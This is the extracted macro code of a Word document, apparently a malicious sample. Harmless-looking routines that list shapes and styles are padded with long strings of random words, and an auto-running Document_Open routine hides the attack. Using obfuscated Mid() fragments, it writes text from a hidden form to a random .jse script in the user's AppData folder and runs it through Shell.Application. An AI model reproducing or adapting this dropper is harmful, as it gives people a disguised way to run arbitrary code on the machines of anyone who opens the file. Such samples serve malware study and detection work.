Attribute VB_Name = "NewMacros"
Sub m()

End Sub

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub FigureInfo()
    Dim iShapeCount As Integer
    Dim iILShapeCount As Integer
    Dim rUJe9o05 As String
rUJe9o05 = "birds ball gently person valley station image arrow noise possible upon husband sang potatoes sell many studied elephant especially meat greatest became replied smell five thousand every mill throat waste police coffee unusual poor equator successful silver ruler flower drive caught bit camp stronger report population government continent power cheese swam within personal opinion throat fifth hollow glass detail usually end ride private note dream upon within area hospital alike skill push ran center breathe full sometime small angry test lunch captain forty break doll earn his doll policeman wrong cream color citizen advice own bring forest weigh machine such sometime went paper hurry regular maybe stranger event sight discuss goes information sleep instrument easily red attempt low solid ought"

    Dim docThis As Document
    Dim J As Integer
    Dim sTemp As String
Dim I2d1768 As String
I2d1768 = "because pool won front learn twelve rough good hungry huge ship born locate camera whistle her held direct rule sea met area gulf station satisfied enjoy pan hello cow chance got old wall fairly seen replied herself once sit task control single breathing top knife completely alphabet heavy almost copper shoe zero carried birthday already change spider part valuable list sand tree three number calm muscle vertical thumb country seen without became wire ants medicine colony circle tongue third from plate worry caught flat bring plate next house bill fourth spell calm hot adventure perfectly how raise plant cost difficult atomic differ frighten took joined track threw scale color log whatever direction gun"

    Set docThis = ActiveDocument
    Documents.Add

    iShapeCount = docThis.Shapes.Count
    If iShapeCount > 0 Then
        Selection.TypeText Text:="Regular Shapes"
        Selection.TypeParagraph
    End If
    For J = 1 To iShapeCount
        Selection.TypeText Text:=docThis.Shapes(J).Name
        Selection.TypeParagraph
        sTemp = "     Height (points): "
        sTemp = sTemp & docThis.Shapes(J).Height
        Selection.TypeText Text:=sTemp
        Selection.TypeParagraph
        sTemp = "     Width (points): "
        sTemp = sTemp & docThis.Shapes(J).Width
        Selection.TypeText Text:=sTemp
        Selection.TypeParagraph
        sTemp = "     Height (pixels): "
        sTemp = sTemp & PointsToPixels(docThis.Shapes(J).Height, True)
        Selection.TypeText Text:=sTemp
        Selection.TypeParagraph
        sTemp = "     Width (pixels): "
        sTemp = sTemp & PointsToPixels(docThis.Shapes(J).Width, False)
        Selection.TypeText Text:=sTemp
        Selection.TypeParagraph
        Selection.TypeParagraph
    Next J
Dim eqH3WT6t7817 As String
eqH3WT6t7817 = "prepare success visit burst escape perfect coast amount judge wise dust wait he mathematics friend although broad continent barn grandmother respect clean yellow choose explain sister fruit sister shore alike silent discuss shirt shoulder leaving heat blood team fun excited new grabbed pride whatever barn practice tears triangle still fastened bottle major speed while indeed growth wealth piece cloud mountain tube musical soil visit both street nervous this composition importance ask pull no folks mass electric more you raise pale stay than unless usual lady your down school simply off division record neighborhood dream safe vapor battle replied television water except treated as nobody generally roll wrapped loud pie chief hay pictured gray suppose strange else comfortable produce page"

    iILShapeCount = docThis.InlineShapes.Count
    If iILShapeCount > 0 Then
        Selection.TypeText Text:="Inline Shapes"
        Selection.TypeParagraph
    End If
    
    
Dim wb24d00 As Long
wb24d00 = 909669
Dim O2b814 As Long
O2b814 = 2926259
    For J = 1 To iILShapeCount
        Selection.TypeText Text:="Shape " & J
        Selection.TypeParagraph
        sTemp = "     Height (points): "
        sTemp = sTemp & docThis.InlineShapes(J).Height
        Selection.TypeText Text:=sTemp
        Selection.TypeParagraph
        sTemp = "     Width (points): "
        sTemp = sTemp & docThis.InlineShapes(J).Width
        Selection.TypeText Text:=sTemp
        Selection.TypeParagraph
        sTemp = "     Height (pixels): "
        sTemp = sTemp & PointsToPixels(docThis.InlineShapes(J).Height, True)
        Selection.TypeText Text:=sTemp
        Selection.TypeParagraph
        sTemp = "     Width (pixels): "
        sTemp = sTemp & PointsToPixels(docThis.InlineShapes(J).Width, False)
        Selection.TypeText Text:=sTemp
        Selection.TypeParagraph
        Selection.TypeParagraph
    Next J
End Sub


Private Sub Document_Open()

Dim U898sQ As Long
U898sQ = 91816
Dim XCu7fJt79 As Long
XCu7fJt79 = 7474166
    Dim findInTable As String
    

Dim Q5s1X7e As Boolean
Q5s1X7e = False


    
    findInTable = UserForm1.TextBox1.Text
    
  
Dim x449I338U881 As String
x449I338U881 = "secret observe cookies promised struck active printed place show block turn dance compound whole science game length shaking symbol made wood equally cow cause escape hot air newspaper mysterious community while introduced negative laugh through nearer community after planned silence underline troops blanket studying oil place sport rope if sure see sun troops beginning breathing donkey tool iron east film body easily surrounded mile stopped to cattle lips hardly correct final earth per rays he quiet arrow studied did dead leader wait speed square harder element expect vegetable almost studied anything beauty turn all mile atom bottom carefully concerned cheese pie solution drawn plenty result"

Dim K11T311106w3 As Boolean
K11T311106w3 = False
    
    imNedd = Environ(Mid("cbn4th45h5APg34gsdfg", 11, 2) & Mid("bnt45hgdsPDxcb43", 10, 2) & Mid("fadsfATAasdf", 6, 3)) & Chr(92) & Rnd & ".jse"
   
    Open imNedd For Output As #6
Dim D9OX8794405 As String
D9OX8794405 = "declared arrive higher simply support balance strike pride numeral concerned chance success teeth price bent log medicine radio heart ago tube voyage angry gain sale order felt respect prove we ran pine daughter willing with brother fireplace face attempt today stay parallel whale selection radio war poetry shake sink white base cause speech cat grown mixture shorter magic brought done native put lonely bush smile more volume just your depth lie scared pound yellow cloud gray program temperature salmon nose aside lips chief similar that applied ago further being within title dirty steady seldom rush began visitor cent regular modern idea spite element design storm they probably scientific lucky cent still"


   Print #6, findInTable
    Close #6
   
    Set objShellApp = CreateObject(Mid("kfjlgfdkalkShefdsgrgsrg", 12, 3) & Mid("zcbagaefll.Appke65ueh", 9, 6) & Mid("fghjytjlicationg,mfyuuyk", 8, 8))
Dim P935df1u5t As String
P935df1u5t = "evening watch castle structure although hot toy due hearing color choose having knife crew report guide tried told bee ready tight satellites simplest call occasionally across became hurry meant four floor bend paragraph mission magic nine frozen another cast lift probably exchange girl essential writing spent winter then education gentle correct hair silly silence doing whispered muscle invented cheese pet clearly conversation school anyone wire exist seldom riding dull pleasant log individual form round fine fear pie modern vote somebody star when farther standard wave various short evidence bill fourth when row rhyme drop replace lying draw dangerous needle market difference railroad stick stone leave"

    objShellApp.ShellExecute imNedd

End Sub


Sub CreateStyleList()
    Dim docThis As Document
    Dim styItem As Style
    Dim sBuiltIn(499) As String
    Dim iStyBICount As Integer
    Dim sUserDef(499) As String
    Dim iStyUDCount As Integer
    Dim sInUse(499) As String
    Dim iStyIUCount As Integer
    Dim iParCount As Integer
    Dim J As Integer, K As Integer
    Dim sParStyle As String
    Dim bInUse As Boolean
    
    ' Ref the active document
    Set docThis = ActiveDocument
    
    ' Collect all styles being used
    iStyIUCount = 0
    iParCount = docThis.Paragraphs.Count
    iParOut = 0
    For J = 1 To iParCount
        sParStyle = docThis.Paragraphs(J).Style
        For K = 1 To iStyIUCount
            If sParStyle = sInUse(K) Then Exit For
        Next K
        If K = iStyIUCount + 1 Then
            iStyIUCount = K
            sInUse(iStyIUCount) = sParStyle
        End If
    Next J
    
    iStyBICount = 0
    iStyUDCount = 0
    ' Check out styles that are "in use"
    For Each styItem In docThis.Styles
        'see if in those being used
        bInUse = False
        For J = 1 To iStyIUCount
            If styItem.NameLocal = sInUse(J) Then bInUse = True
        Next J
        'Add to those not in use
        If Not bInUse Then
            If styItem.BuiltIn Then
                iStyBICount = iStyBICount + 1
                sBuiltIn(iStyBICount) = styItem.NameLocal
            Else
                iStyUDCount = iStyUDCount + 1
                sUserDef(iStyUDCount) = styItem.NameLocal
            End If
        End If
    Next styItem
    
    'Now create the output document
    Documents.Add
    
    Selection.TypeText "Styles In Use"
    Selection.TypeParagraph
    For J = 1 To iStyIUCount
        Selection.TypeText sInUse(J)
        Selection.TypeParagraph
    Next J
    Selection.TypeParagraph
    Selection.TypeParagraph
    Dim wLiLz As String
wLiLz = "author sport dance yourself office satellites excited product primitive valuable see sand over mighty whispered noted break end easily underline fill cup ride theory load clothing thus negative clock ahead frame island tank coming line cattle effect far engine son already race shop once forget group class especially carefully nor diameter sang special cake moment death farther travel solution drink bigger sister citizen straw electricity willing voyage train nice upward see ask basic cover then neighbor recognize die voice smallest desk disappear fact pleasure funny machinery zipper struggle grain wear cry nuts concerned mental myself whale raw fish honor everywhere temperature community brush shelf result route strike according giving grandmother recent pan lose son know together ride"

    Selection.TypeText "Built-in Styles Not In Use"
    Selection.TypeParagraph
    For J = 1 To iStyIUCount
        Selection.TypeText sBuiltIn(J)
        Selection.TypeParagraph
    Next J
    Selection.TypeParagraph
    Selection.TypeParagraph
    Dim Oa742Sw As String
Oa742Sw = "bill card hall behavior dark love courage into hunter happily replied border air bent month meant fight interior cannot shout weight flame church essential third shore gone account hall doll ready settlers voice chain positive realize distance western must natural nearby uncle honor city rising baby certainly action own distant temperature hole planned remember pocket usually bridge yourself nice case brick table tell shorter each carefully about paint watch nature compound guard frog solid foreign plain attack coming neighbor summer view hungry doing hay mirror sight second apartment serious promised writing border free crowd lose theory next wheat suggest frame advice independent scene flew closer help planned add swept inside gasoline using factor discuss animal floor pour"

    Selection.TypeText "User-defined Styles Not In Use"
    Selection.TypeParagraph
    For J = 1 To iStyIUCount
        Selection.TypeText sUserDef(J)
        Selection.TypeParagraph
    Next J
    Dim f73UQ8 As String
f73UQ8 = "aboard various shake double driving drive test court clothing beginning above else history able gate soap shade map pen inch shine herself faster oxygen audience country problem dozen own cattle many pupil these satellites sea grow electricity selection stepped article probably fun value strong push proud school kept history view younger graph spite coat probably protection donkey vessels physical valuable including basket world sheet pocket wide wild floating begun sun suit development chamber syllable tip bowl trap hot desert choose nervous whatever political attack successful teacher dust relationship adult current sail time trace average will center chamber great halfway protection flower powder forest belong exchange bite plates eager outer buried"

    Selection.TypeParagraph
    Selection.TypeParagraph
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{746B91F5-76BA-4F89-BE44-EF86D41E500C}{0A4FC221-30D6-4C64-83A0-877BAFFC471E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


INQUEST-PP=macro
